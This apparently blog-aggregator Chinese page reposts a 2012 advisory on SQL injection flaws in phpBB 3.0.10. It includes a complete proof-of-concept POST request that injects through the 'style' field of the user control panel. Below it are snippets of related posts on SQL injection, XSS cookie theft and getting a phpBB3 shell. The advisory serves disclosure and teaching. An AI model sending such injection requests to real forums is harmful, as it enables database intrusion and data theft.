Linux注入漏洞,phpBB多个SQL注入漏洞

最新推荐文章于 2022-12-06 17:33:40 发布
最新推荐文章于 2022-12-06 17:33:40 发布
阅读量698 收藏
点赞数
文章标签: Linux注入漏洞

发布日期:2012-07-28

更新日期:2012-08-01

受影响系统:

phpBB Group phpBB

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 54734

phpBB是全球流行的开源公告牌系统。

phpBB 3.0.10及其他版本在实现上存在多个SQL注入漏洞,成功利用后可允许攻击者控制应用,访问或修改数据,利用下层数据库中的其他漏洞。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

HauntIT ()提供了如下测试方法:

Request :

---

POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174

Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=

Content-Type: application/x-www-form-urlencoded

Content-Length: 258

Connection: close

viewemail=1

&massemail=1

&allowpm=1

&hideonline=0

&notifypm=1

&popuppm=0

&lang=en

&style=%2b1111111111

&tz=0

&dst=0

&dateoptions=D+M+d%2C+Y+g%3Ai+a

&dateformat=D+M+d%2C+Y+g%3Ai+a

&submit=Submit

&creation_time=1343370877

&form_token=576...

建议:

--------------------------------------------------------------------------------

厂商补丁:

phpBB Group

-----------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

0b1331709591d260c1c78e86d0c51c18.png

php漏洞
12-12 713
从现在的网络安全来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权.然而在PHP方面来看,也同样存在 很严重的安全问题,但是这方面的文章却不多.在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧.     我对目前常见的PHP漏洞做了一下总结,大致分为以下几种包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种.当然,至于 COOKI
SQL注入攻击及防御 手动注入+sqlmap自动化注入实战(网络安全学习12)
Until_U的博客
07-05 5670
1 项目实验环境 测试渗透机:kali_linux-2020 链接:https://pan.baidu.com/s/1apN96nIcs1Fyx8YmFs24Xg 提取码:32ve 目标靶机:owasp_Broken_Web_Apps 链接:https://pan.baidu.com/s/1CMJ2aERmDGlXXkhUmjDmtA 提取码:9zsj 2 SQL注入概述 2.1 SQL注入简介 在owasp年度top 10安全问题中,注入高居榜首。SQL注入攻击指的是通过构建特殊..
phpBB 2.06漏洞
guagua
12-19 1707
phpBB 2.06的这个漏洞可以让黑客通过SQL查询获得对论坛管理员控制权限,这个php 脚本没有完全过滤search_id参数,使得黑客可以从受害主机的数据库里导出hash的关键数据来破解。 危害性这个漏洞存在Apache 2上的MySQL的 PHP4数据库中,我们对他进行测试,就能得到管理员的MD5 密码。黑客手中的hash通过构建cookie就可以进入管理员的帐号,而不用破解h
linux命令注入,Linux kernel本地命令注入漏洞
weixin_39794340的博客
04-28 248
Linux kernel本地命令注入漏洞2005-10-19eNet&CiweekLinux kernel 2.2.6Linux kernel 2.2.5Linux kernel 2.2.4Linux kernel 2.2.3Linux kernel 2.2.2Linux kernel 2.2.1Linux kernel 2.2 .x+ RedHat Linux 6.2 alpha+ Re...
[原创]实践phpbb论坛非法权限提升的漏洞
落叶树的BLOG
02-07 4655
google搜索Powered by phpBB 2.0.0出来了一堆.在注册一个论坛用户时,我填了个并不存在的EMAIL地址。点注册后出现了以下文字。一般錯誤 Failed sending email :: PHP :: DEBUG MODELine : 246File : C:www_sabeadingphpBB2.0.5_chtincludesemailer.php 晕,这个倒还真是为我们的
php怎么把submit存储起来_phpBB漏洞分析:从CSRF令牌劫持到存储型XSS
weixin_39811150的博客
01-24 91
0x00 前言当管理员访问phpBB中的管理员控制面板(ACP),然后再点击“Board index”链接时,系统会将会话id存放在GET请求的URL参数中。通过精心构造的远程avatar URL,攻击者可以窃取这个会话ID,然后发起CSRF攻击,创建XSS BBCode,在目标服务器上实现存储型XSS。漏洞相关信息如下:CVE:CVE-2019-13376影响范围:phpBB 3.2....
高级PHP应用程序漏洞审核技术
04-03
- **PHP版本差异**:PHP经历了多个版本的发展,包括PHP4、PHP5和PHP6。每个版本之间存在显著差异,特别是安全性方面的改进。例如,PHP6取消了许多安全选项,如`magic_quotes_gpc`。因此,在审计过程中考虑不同版本的...
phpBB v3.0.5 源码包,支持多国语言的论坛软件
此外,安全性能的提升可能意味着更好的防范恶意软件和SQL注入攻击,以及其他潜在的安全威胁。 7. **商业源码与编程源码**: 此处的“商业源码”可能指的是phpBB可以在商业环境中使用,并且提供了一些商业支持选项。...
模糊测试--强制性安全漏洞发掘
热门推荐
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
儿童户外摄影网站系统源代码发布
4. 网站开发相关技术:开发专业儿童户外摄影网站系统,需要掌握的技能不仅限于编程,还可能包括数据库管理(如MySQL、MongoDB)、网站安全防护(如HTTPS、XSS防护、SQL注入防护)、网站性能优化(如缓存使用、CDN...
怎样测试php系统漏洞,两个php论坛sql注入漏洞及测试方法
weixin_39980002的博客
03-19 343
一.phpBB远程任意SQL注入漏洞受影响系统:phpBB Group phpBB 2.0.9phpBB Group phpBB 2.0.8 aphpBB Group phpBB 2.0.8phpBB Group phpBB 2.0.7phpBB Group phpBB 2.0.6 dphpBB Group phpBB 2.0.6 cphpBB Group phpBB 2.0.6phpBB Gro...
phpBB附件模块HTTP POST注入远程目录遍历漏洞
陈巍@人生态度
12-17 1351
由于attachment mod用户接口不充分过滤文件名数据,通过HTTP POST,注入包含多个../字符的文件名,可绕过WEB ROOT限制,以用户进程权限查看系统文件内容1)发起一个新贴,通过"Add Attachment"添加文件。2)在点击发送前,查看源代码。3)修改表单值,把"attachment_list[]"和"filename_list[]"的值修改为"../../$newf
修正phpBB 2.0.x两个安全漏洞 (转)
ciya3282的博客
11-09 236
修正phpBB 2.0.x两个安全漏洞 (转)[@more@]PHPBB开发组最近公布了phpBB 2.0.x两个安全漏洞的修正办法: 1. sql注射漏洞: 修改viewtopic.php。在 代码: if ( isset($...
PHP处理mysql注入漏洞原理及方法
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
12-06 956
SQL注入可以造成数据库信息泄露,特别是数据库中存放的用户隐私信息的泄露。通过操作数据库对特定网页进行篡改,修改数据库一些字段的值,嵌入恶意链接,进行挂马攻击,传播恶意软件。服务器还容易被远程控制,被安装后门,经由数据库服务器提供的操作系统支持,让攻击者得以修改或控制操作系统以及破坏硬盘数据,瘫痪全系统。
SQL注入实验
weixin_30615767的博客
04-10 197
实验过程 环境配置 1.运行Apache Server:镜像已经安装,只需运行命令 sudo service apache2 start 2.phpBB2 web应用:镜像已经安装,通过http://www.sqllabmysqlphpbb.com访问,应用程序源代码位于/var/www/SQL/SQLLabMysqlPhpbb/ 3.配置DNS:上述的URL仅仅在镜像内部可以访问,原因是我们修改...
phpbb3 后台拿shell
weixin_34266504的博客
08-05 626
内容: phpbb3 拿到管理员账号进去能干什么呢?又不能上传个SHELL。确实很头疼啊 搜半天都没搜到有牛人拿到过。难道没人研究它? 去年就试过些招。还是没搞定。今天遇到个phpbb3。终于还是拿到shell了。。。 要是能找到执行类似phpmyadmin之类的执行数据库语句的地方。拿shell还是比较简单的 需要两条语句。还有绝对路径。。如下 INSERT...
http应答分割攻击
mgxcool的专栏
06-11 2695
phpbb上的一个比较经典的漏洞,估计这个攻击也是因为这个漏洞而来的,没见到在其它地方出现过这个漏洞。 产生原因大概是这样: phpbb会将用户请求中的参数放到response的refresh头中。 如: GET /a.php?url=test.php 那么response中就会多出如下一个refresh头: REFRESH:0;URL=http://SERVE
软件安全实验——lab11(XSS跨站脚本攻击)
Onlyone_1314的博客
08-16 7217
目录标题一级目录二级目录1、概述2、实验室环境3、实验室的任务3.1任务1:发布恶意消息以显示警报窗口3.2任务2:发送恶意信息显示cookie3.3任务3:从受害者的机器上偷取cookies3.4任务4:用偷来的cookie冒充受害者3.5任务5:编写跨站蠕虫3.6任务6:编写自传播跨站蠕虫4、提交 一级目录 二级目录 1、概述 跨站脚本(XSS)是 web应用程序中常见的一种漏洞。该漏洞使得攻击者有可能将恶意代码(如 JavaScript程序)注入受害者的网络浏览器。使用这种恶意代码,攻击者可以窃取受
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值